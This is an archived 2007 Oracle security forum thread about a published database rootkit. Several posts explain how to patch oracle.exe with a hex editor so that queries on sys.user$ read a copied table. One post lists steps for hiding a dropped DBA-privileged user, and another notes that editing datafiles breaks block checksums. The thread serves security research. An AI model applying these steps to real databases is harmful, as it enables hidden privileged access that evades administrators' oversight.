Pete Finnigan's Oracle Security Forum
        (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
      

        Oracle Security >> Oracle Security >> Oracle Rootkit: Modify the binary file
        
(Message started by: Pete Finnigan on May 18th, 2007, 8:29am)
Title: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 18th, 2007, 8:29am
2 all,

I read the Oracle Rootkit whitepaper of Alex:

Alex show the way to make a rootkit: replace all sys.user$ to sys.aser$ in a binary file.

If you already know that, please help me anwser two questions:
1. Which binary file Alex mention about ? and
2. How can we modify the binary without breaking the Data Integrity of Oracle ?

I replaced all the sys.user to sys.aser in the datafile of SYSTEM tablespace, but after that, I cant OPEN my Database.

Thanks.
Title: Re: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 18th, 2007, 1:58pm
Hi

You must modify the binary file oracle.exe (don't forget to save a copy) with a hex editor (e.g. ultraedit). The file oracle.exe contains the select statements retrieving data from the sys.user$. If you replace sys.user$ with sys.aser$ Oracle is retrieving data from there.

If you modify the datafile of the system-tablespace the block checksums are corrupted and Oracle will not start

I hope this is sufficient.

Regards

Alex

--
Red-Database-Security GmbH
Title: Re: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 20th, 2007, 9:46pm
Hi,

As Alex says you must modify the binaries not the data files. Although that said I can (using thought experiments) see ways to create rootkits by modifying data blocks. To modify a datablock as Alexsays you must at least correct the checksums to make the block pass load checks.

Also of interest is a paper on my internals page - http://www.petefinnigan.com/other.htm that shows how to modify the database bootstrap$ - http://www.vijaymukhi.com/oracled.doc - (Its an MS Word doc - its not mine - beware opening word docs. I have opened it and it was fine but you should save/virus check then open locally if you are worried) - This is also an interesting post and gives me interesting ideas in the areas of rootkits.

cheers

Pete
Title: Re: Oracle Rootkit: Modify the binary file
Post by Pete Finnigan on May 21st, 2007, 7:17am
Hi Alex,

I follow the steps in your whitepaper, but It seems that I'm not lucky:
1. Create a user hacker with DBA privileges
2. Create a copy of the table sys.user$
3. Drop user hacker from sys.user$
4. Shutdown database
5. Patch binary file
6. Start database

I replaced all the sys.user$ to sys.aser$ in the oracle.exe file, but I cant login successfully with dropped user.

I tested on the following version: 9.2.0.1, 10.2.0.1 and 10.2.0.3.

Should I need to make any additional step ?

Thank Alex.

Thank Pete for the good paper.

Regards.


Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board